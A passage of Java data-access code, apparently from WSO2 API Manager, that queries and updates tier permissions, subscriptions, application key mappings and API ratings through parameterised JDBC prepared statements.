ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public TierPermissionDTO getThrottleTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public void updateThrottleTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("THROTTLE_TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getThrottleTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } private Set<String> getApplicationKeys(int applicationId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Set<String> apiKeys = new HashSet<String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, applicationId); result = ps.executeQuery(); while (result.next()) { apiKeys.add(APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get keys for application: " + applicationId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_SUFFIX; } /** * Get access token data based on application ID * * @param subscriptionId Subscription Id * @return access token data * @throws APIManagementException */ public Map<String, String> getAccessTokenData(int subscriptionId) throws APIManagementException { Map<String, String> apiKeys = new HashMap<String, String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(null)); } return apiKeys; } private Map<String, String> getAccessTokenData(int subscriptionId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<String, String> apiKeys = new HashMap<String, String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { apiKeys.put("token", APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); apiKeys.put("status", result.getString("TOKEN_STATE")); } } catch (SQLException e) { handleException("Failed to get keys for application: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSqlUsingSubscriptionId(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_SUFFIX; } /** * This method returns the set of Subscribers for given provider * * @param providerName name of the provider * @return Set<Subscriber> * @throws APIManagementException if failed to get subscribers for given provider */ public Set<Subscriber> getSubscribersOfProvider(String providerName) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); while (result.next()) { // Subscription table should have API_VERSION AND API_PROVIDER Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setName(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to subscribers for :" + providerName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public Set<Subscriber> getSubscribersOfAPI(APIIdentifier identifier) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getTimestamp(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for :" + identifier.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public long getAPISubscriptionCountByAPI(APIIdentifier identifier) throws APIManagementException { String sqlQuery = SQLConstants.GET_API_SUBSCRIPTION_COUNT_BY_API_SQL; long subscriptions = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { subscriptions = result.getLong("SUB_ID"); } } catch (SQLException e) { handleException("Failed to get subscription count for API", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } /** * This method is used to update the subscriber * * @param identifier APIIdentifier * @param context Context of the API * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscriptions(APIIdentifier identifier, String context, int applicationId, String subscriber) throws APIManagementException { addSubscription(identifier, context, applicationId, APIConstants.SubscriptionStatus.UNBLOCKED, subscriber); } /** * This method is used to update the subscription * * @param identifier APIIdentifier * @param subStatus Subscription Status[BLOCKED/UNBLOCKED] * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscription(APIIdentifier identifier, String subStatus, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement updatePs = null; int apiId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); resultSet = ps.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } String subsCreateStatus = getSubscriptionCreaeteStatus(identifier, applicationId, conn); if (APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subsCreateStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_APPLICATION_SQL; //Updating data to the AM_SUBSCRIPTION table updatePs = conn.prepareStatement(sqlQuery); updatePs.setString(1, subStatus); updatePs.setString(2, identifier.getProviderName()); updatePs.setTimestamp(3, new Timestamp(System.currentTimeMillis())); updatePs.setInt(4, apiId); updatePs.setInt(5, applicationId); updatePs.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(updatePs, null, null); } } /** * This method is used to update the subscription * * @param subscribedAPI subscribedAPI object that represents the new subscription detals * @throws APIManagementException if failed to update subscription */ public void updateSubscription(SubscribedAPI subscribedAPI) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_UUID_SQL; //Updating data to the AM_SUBSCRIPTION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscribedAPI.getSubStatus()); //TODO Need to find logged in user who does this update. ps.setString(2, null); ps.setTimestamp(3, new Timestamp(System.currentTimeMillis())); ps.setString(4, subscribedAPI.getUUID()); ps.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void updateSubscriptionStatus(int subscriptionId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query is to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, status); ps.setInt(2, subscriptionId); ps.execute(); //Commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback subscription status update ", e1); } } handleException("Failed to update subscription status ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getRegistrationApprovalState(int appId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String state = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_REGISTRATION_APPROVAL_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, appId); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { state = resultSet.getString("STATE"); } } catch (SQLException e) { handleException("Error while getting Application Registration State.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return state; } /** * Update the consumer key and application status for the given key type and application. * * @param application * @param keyType */ public void updateApplicationKeyTypeMapping(Application application, String keyType) throws APIManagementException { OAuthApplicationInfo app = application.getOAuthApp(keyType); String consumerKey = null; if (app != null) { consumerKey = app.getClientId(); } if (consumerKey != null && application.getId() != -1) { String addApplicationKeyMapping = SQLConstants.UPDATE_APPLICAITON_KEY_TYPE_MAPPINGS_SQL; Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setString(1, consumerKey); ps.setInt(2, application.getId()); ps.setString(3, keyType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error updating the CONSUMER KEY of the AM_APPLICATION_KEY_MAPPING table where " + "APPLICATION_ID = " + application.getId() + " and KEY_TYPE = " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * This method will create a new client at key-manager side.further it will add new record to * the AM_APPLICATION_KEY_MAPPING table * * @param keyType * @param applicationName apim application name. * @param userName apim user name * @param clientId this is the consumner key. * @throws APIManagementException */ public void createApplicationKeyTypeMappingForManualClients(String keyType, String applicationName, String userName, String clientId) throws APIManagementException { String consumerKey = null; if (clientId != null) { consumerKey = clientId; } Connection connection = null; PreparedStatement ps = null; //APIM application id. int applicationId = getApplicationId(applicationName, userName); if (consumerKey != null) { String addApplicationKeyMapping = SQLConstants.ADD_APPLICATION_KEY_TYPE_MAPPING_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setInt(1, applicationId); ps.setString(2, consumerKey); ps.setString(3, keyType); ps.setString(4, APIConstants.AppRegistrationStatus.REGISTRATION_COMPLETED); // If the CK/CS pair is pasted on the screen set this to MAPPED ps.setString(5, "MAPPED"); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while inserting record to the AM_APPLICATION_KEY_MAPPING table, " + "error is = " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * Updates the state of the Application Registration. * * @param state State of the registration. * @param keyType PRODUCTION | SANDBOX * @param appId ID of the Application. * @throws APIManagementException if updating fails. */ public void updateApplicationRegistration(String state, String keyType, int appId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String sqlStmt = SQLConstants.UPDATE_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlStmt); ps.setString(1, state); ps.setInt(2, appId); ps.setString(3, keyType); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error while updating registration entry.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * @param apiIdentifier APIIdentifier * @param userId User Id * @return true if user subscribed for given APIIdentifier * @throws APIManagementException if failed to check subscribed or not */ public boolean isSubscribed(APIIdentifier apiIdentifier, String userId) throws APIManagementException { boolean isSubscribed = false; String loginUserName = getLoginUserName(userId); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiIdentifier.getProviderName())); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, apiIdentifier.getVersion()); ps.setString(4, loginUserName); int tenantId; tenantId = APIUtil.getTenantId(loginUserName); ps.setInt(5, tenantId); rs = ps.executeQuery(); if (rs.next()) { isSubscribed = true; } } catch (SQLException e) { handleException("Error while checking if user has subscribed to the API ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return isSubscribed; } /** * @param providerName Name of the provider * @return UserApplicationAPIUsage of given provider * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get * UserApplicationAPIUsage for given provider */ public UserApplicationAPIUsage[] getAllAPIUsageByProvider(String providerName) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_APP_API_USAGE_BY_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); Map<String, UserApplicationAPIUsage> userApplicationUsages = new TreeMap<String, UserApplicationAPIUsage>(); while (result.next()) { int subId = result.getInt("SUBSCRIPTION_ID"); Map<String, String> keyData = getAccessTokenData(subId); String accessToken = keyData.get("token"); String tokenStatus = keyData.get("status"); String userId = result.getString("USER_ID"); String application = result.getString("APPNAME"); int appId = result.getInt("APPLICATION_ID"); String subStatus = result.getString("SUB_STATUS"); String subsCreateState = result.getString("SUBS_CREATE_STATE"); String key = userId + "::" + application; UserApplicationAPIUsage usage = userApplicationUsages.get(key); if (usage == null) { usage = new UserApplicationAPIUsage(); usage.setUserId(userId); usage.setApplicationName(application); usage.setAppId(appId); usage.setAccessToken(accessToken); usage.setAccessTokenStatus(tokenStatus); userApplicationUsages.put(key, usage); } APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), result.getString ("API_NAME"), result.getString("API_VERSION")); SubscribedAPI apiSubscription = new SubscribedAPI(new Subscriber(userId), apiId); apiSubscription.setSubStatus(subStatus); apiSubscription.setSubCreatedStatus(subsCreateState); apiSubscription.setUUID(result.getString("SUB_UUID")); apiSubscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); Application applicationObj = new Application(result.getString("APP_UUID")); apiSubscription.setApplication(applicationObj); usage.addApiSubscriptions(apiSubscription); } return userApplicationUsages.values().toArray(new UserApplicationAPIUsage[userApplicationUsages.size()]); } catch (SQLException e) { handleException("Failed to find API Usage for :" + providerName, e); return null; } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } } /** * @param apiName Name of the API * @param apiVersion Version of the API * @param provider Name of API creator * @return All subscriptions of a given API * @throws org.wso2.carbon.apimgt.api.APIManagementException */ public List<SubscribedAPI> getSubscriptionsOfAPI(String apiName, String apiVersion, String provider) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; List<SubscribedAPI> subscriptions = new ArrayList<>(); try { String sqlQuery = SQLConstants.GET_SUBSCRIPTIONS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, apiVersion); ps.setString(3, provider); result = ps.executeQuery(); while (result.next()) { APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), apiName, apiVersion); Subscriber subscriber = new Subscriber(result.getString("USER_ID")); SubscribedAPI subscription = new SubscribedAPI(subscriber, apiId); subscription.setUUID(result.getString("SUB_UUID")); subscription.setSubStatus(result.getString("SUB_STATUS")); subscription.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); subscription.setCreatedTime(result.getString("SUB_CREATED_TIME")); Application application = new Application(result.getInt("APPLICATION_ID")); application.setName(result.getString("APPNAME")); subscription.setApplication(application); subscriptions.add(subscription); } } catch (SQLException e) { handleException("Error occurred while reading subscriptions of API: " + apiName + ':' + apiVersion, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } private void updateOAuthConsumerApp(String appName, String callbackUrl) throws IdentityOAuthAdminException, APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String sqlStmt = SQLConstants.UPDATE_OAUTH_CONSUMER_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(sqlStmt); prepStmt.setString(1, callbackUrl); prepStmt.setString(2, appName); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error when updating OAuth consumer App for " + appName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } private boolean isDuplicateConsumer(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rSet = null; String sqlQuery = SQLConstants.GET_ALL_OAUTH_CONSUMER_APPS_SQL; boolean isDuplicateConsumer = false; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rSet = prepStmt.executeQuery(); if (rSet.next()) { isDuplicateConsumer = true; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rSet); } return isDuplicateConsumer; } public int addApplication(Application application, String userId) throws APIManagementException { Connection conn = null; int applicationId = 0; String loginUserName = getLoginUserName(userId); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); applicationId = addApplication(application, loginUserName, conn); if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, applicationId, application.getGroupId(), tenantDomain); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return applicationId; } public void addRating(APIIdentifier apiId, int rating, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); addRating(apiId, rating, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public void addRating(APIIdentifier apiIdentifier, int rating, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } boolean userRatingExists = false; //This query to check the ratings already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_API_RATING_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { userRatingExists = true; } String sqlAddQuery; if (!userRatingExists) { //This query to update the AM_API_RATINGS table sqlAddQuery = SQLConstants.APP_API_RATING_SQL; } else { //This query to insert into the AM_API_RATINGS table sqlAddQuery = SQLConstants.UPDATE_API_RATING_SQL; } // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rating); ps.setInt(2, apiId); ps.setInt(3, subscriber.getId()); ps.executeUpdate(); } catch (SQLException e) { handleException("Failed to add API rating of the user:" + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); APIMgtDBUtil.closeAllConnections(psSelect, null, null); } } public void removeAPIRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); removeAPIRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public void removeAPIRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; int rateId = -1; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query to check the ratings already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_ID_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { rateId = rs.getInt("RATING_ID"); } String sqlAddQuery; if (rateId != -1) { //This query to delete the specific rate row from the AM_API_RATINGS table sqlAddQuery = SQLConstants.REMOVE_RATING_SQL; // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rateId); ps.executeUpdate(); } } catch (SQLException e) { handleException("Failed to delete API rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(psSelect, null, rs); } } public int getUserRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; int userRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); userRating = getUserRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return userRating; } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public int getUserRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; int userRating = 0; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_SQL; // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscriber.getId()); ps.setInt(2, apiId); rs = ps.executeQuery(); while (rs.next()) { userRating = rs.getInt("RATING"); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return userRating; } public float getAverageRating(APIIdentifier apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); avrRating = getAverageRating(apiId, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return avrRating; } public float getAverageRating(int apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (apiId == -1) { String msg = "Invalid APIId : " + apiId; log.error(msg); return Float.NEGATIVE_INFINITY; } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { 